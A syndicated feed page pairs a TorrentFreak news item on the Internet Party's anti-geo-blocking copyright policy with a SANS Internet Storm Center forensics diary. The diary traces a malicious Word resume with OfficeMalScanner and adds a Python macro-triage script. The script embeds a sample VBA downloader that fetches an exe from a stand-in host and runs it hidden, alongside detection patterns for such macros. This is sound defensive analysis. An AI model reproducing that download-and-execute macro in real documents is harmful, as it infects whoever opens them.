TorrentFreak: Dotcom’s Internet Party Wants to Abolish “Geo Blocking” Restrictions

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

Last January, exactly two years after the Megaupload raid, Kim Dotcom entered New Zealand’s political arena with the launch of his Internet Party.

The party is currently preparing for the general election in September. While Dotcom will not be on the voting ballot himself, he remains one of the main influencers of the party’s policy.

As the name suggests, many of the party’s core issues revolve around the Internet, copyright included. Today the Internet Party released a draft of its copyright policy with several suggestions for an overhaul of current legislation.

One of the key issues the Internet Party wants to change is the liability New Zealanders face for using VPN services and other circumvention tools to access legal content. At the moment, it is illegal for them to stream content from U.S.-based Hulu and Netflix via proxies or VPNs.

TorrentFreak spoke with Kim Dotcom who notes that consumers shouldn’t be punished for the inability of Hollywood to release its content globally. Dotcom hopes that these changes will eventually put a stop to the unnecessary release delays.

“The primary goal of this policy is to force copyright holders to release their content globally, without geographical restrictions. If a TV-show is not available in New Zealand for three months after the U.S. release, there should be no enforcement during this period,” Dotcom tells us.

“Content owners should be held responsible, not the public. The ‘geo blocking’ proposal forces Hollywood to change its business model and release its content worldwide without delays,” he adds.

Dotcom hopes that the Internet Party proposal will serve as a model for future copyright law that will eventually be adopted around the world.

Hulu’s Geo Blocking

Internet Party leader Laila Harré notes that the current situation is unmanageable. The Internet has made it possible to release content worldwide without any delays, but content owners refuse to give consumers what they want.

“A Kiwi who wants to watch the latest season of first run TV shows like Game of Thrones, for example, shouldn’t be forced to jump through hoops to access what should be legally and easily available online. It’s a ridiculous situation in this day and age,” Harré notes.

Thus far, however, most movement has been in the opposite direction. In an attempt to crack down on people who bypass geo restrictions, Hulu recently started to ban all visitors who use a VPN connection.

Instead of fighting circumvention, the Internet Party believes that copyright holders should address the root of the problem themselves. Making sure that the latest TV-shows can be watched legally is a must, and although some progress has been made over the years, the legal options are still lacking.

“Some excellent work has been done by some copyright owners and content providers to make good legal options available to New Zealanders. But there’s still a long way to go, especially for some types of content such as globally popular first run television shows broadcast overseas but not available in New Zealand for weeks or months, if at all,” Harré says.

Aside from geo blocking issues, the Internet Party also wants to abolish the Internet disconnection sanction available under New Zealand’s “three-strikes” law, and strengthen the “safe harbor” provisions for Internet services to prevent abuse by copyright holders.

The full draft of the Internet Party’s copyright and open research policy is available here.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: OfficeMalScanner helps identify the source of a compromise, (Sun, Jun 22nd)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

While working a recent forensics case I had the opportunity to spread the proverbial wings a bit and utilize a few tools I had not prior.
In the midst of building my forensic timeline I set out to determine the initial attack vector, operating on the assumption that it was either web-based content via a malicious ad or a site compromised with a web exploit kit, or a malicious link or document attachment via email. One interesting variable stood out while reviewing the victim’s PST file. Her company was in the midst of hiring, seeking candidates for a few positions, and was receiving numerous emails with resume attachments, both PDF and DOC/DOCX. I had already discovered the primary malware compromise of the victim’s system, so I simply needed to see if there was a malicious email that had arrived prior, based on time stamps. One particular email with a Word doc attached stood right out, as it arrived at 12:23am on the same day as the malware compromise later at noon. Antimalware detection immediately identified the attachment as TrojanDownloader:W97M/Ledod.A. This alleged resume attachment was also for a John Cena, which cracked me up as I am indeed familiar with the WWE professional wrestler of the same name.

Unfortunately, technical details for W97M/Ledod.A were weak at best and all I had to go from initially was “this trojan can download and run other malware or potentially unwanted software onto your PC.” Yeah, thanks for that. What is a poor forensicator to do? Frank Boldewin’s (Reconstructer.org) OfficeMalScanner to the rescue! This tool works like a charm when you want a quick method to scan for shellcode and encrypted PE files, as well as pulling macro details from nasty Office documents. As always, when you choose to interact with mayhem, it’s best to do so in an isolated environment; I run OfficeMalScanner on a Windows 7 virtual machine. If you just run OfficeMalScanner without defining any parameters, it kindly dumps options for you as seen in Figure 1.

Figure 1: OfficeMalScanner options

For this particular sample, when I ran OfficeMalScanner.exe "John Cena Resume.doc" scan the result “No malicious traces found in this file!” was returned. As the tool advised me to do, I ran OfficeMalScanner.exe "John Cena Resume.doc" info as well and struck pay dirt as seen in Figure 2.

Figure 2: OfficeMalScanner finds macro code

When I opened ThisDocument from C:\tools\OfficeMalScanner\JOHN CENA RESUME.DOC-Macros I was treated to the URL and executable payload I was hoping for as seen in Figure 3.

Figure 3: OfficeMalScanner results

A little virustotal.com and urlquery.net research on dodevelopments.com told me everything I needed to know, pure Lithuanian evil in the form of IP address 5.199.165.239.  
A bit of trekking through all the malicious exe’s known to be associated with that IP address and voila, I had my source.
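As an added example (not from this diary and not part of OfficeMalScanner), here is a small Python triage pass over macro source text of the kind the info mode dumps into the *-Macros folder: it pulls the auto-execution entry point, the Win32 imports, and any download URL or dropped executable name, which is exactly what you want to carry into VirusTotal or urlquery research. The VBA sample, the example.invalid URL and the file name are constructed for illustration.

```python
import re

# Constructed VBA macro text, written to resemble what OfficeMalScanner's
# "info" mode dumps into the *-Macros folder. Hypothetical sample, not the
# macro from the diary's resume document.
SAMPLE_MACRO = r'''
Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal pCaller As Long, _
    ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, _
    ByVal lpfnCB As Long) As Long

Sub AutoOpen()
    Dim target As String
    target = Environ("TEMP") & "\svc_update.exe"
    URLDownloadToFileA 0, "http://example.invalid/dl/svc_update.exe", target, 0, 0
    Shell target, vbHide
End Sub
'''

# Document-level auto-execution entry points used by Word/Excel macros.
AUTOEXEC = re.compile(
    r'\bSub\s+(AutoOpen|Document_Open|AutoExec|Auto_Open|Workbook_Open)\b', re.I)
# Win32 API imports; "urlmon" is the classic download library.
DECLARE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?Function\s+(\w+)\s+Lib\s+"([^"]+)"', re.I)
URL = re.compile(r'https?://[^\s"\'<>]+', re.I)
DROPPED = re.compile(r'[\w.-]+\.(?:exe|dll|scr|vbs|ps1|bat)\b', re.I)
# Calls worth flagging; matched as prefixes so URLDownloadToFileA also hits.
CALLS = ("URLDownloadToFile", "Shell", "CreateObject", "WScript.Shell", "Environ")

def triage_macro(vba: str) -> dict:
    """Pull download/exec indicators from extracted macro source text."""
    calls = [c for c in CALLS if re.search(r'\b' + re.escape(c), vba, re.I)]
    report = {
        "autoexec": sorted(set(m.group(1) for m in AUTOEXEC.finditer(vba))),
        "imports": sorted(set(DECLARE.findall(vba))),
        "urls": sorted(set(URL.findall(vba))),
        "files": sorted(set(f.lower() for f in DROPPED.findall(vba))),
        "calls": calls,
    }
    downloads = bool(report["urls"]) and "URLDownloadToFile" in calls
    executes = "Shell" in calls or "WScript.Shell" in calls
    if report["autoexec"] and downloads and executes:
        report["verdict"] = "macro downloader"
    elif report["autoexec"] and (downloads or executes):
        report["verdict"] = "suspicious"
    else:
        report["verdict"] = "no download/exec pattern"
    return report
```

Point `triage_macro` at the text of each file in the extracted macros folder; a verdict of "macro downloader" with a URL and a dropped file name is the same pairing the diary pulled out of ThisDocument by hand.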

See Jared Greenhill’s writeup on these same concepts at EMC’s RSA Security Analytics Blog and our own Lenny Zeltser’s Analyzing Malicious Documents Cheat Sheet where I first learned about OfficeMalScanner. Prior related diaries also include Decoding Common XOR Obfuscation in Malicious Code and Analyzing Malicious RTF Files Using OfficeMalScanner’s RTFScan (Lenny is El Jefe).

I hope to see some of you at SANSFIRE 2014. I’ll be there for the Monday evening State of the Internet Panel Discussion at 7:15 and will present C3CM Defeating the Command, Control, and Communications of Digital Assailants on Tuesday evening at 8:15.

Russ McRee | @holisticinfosec

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.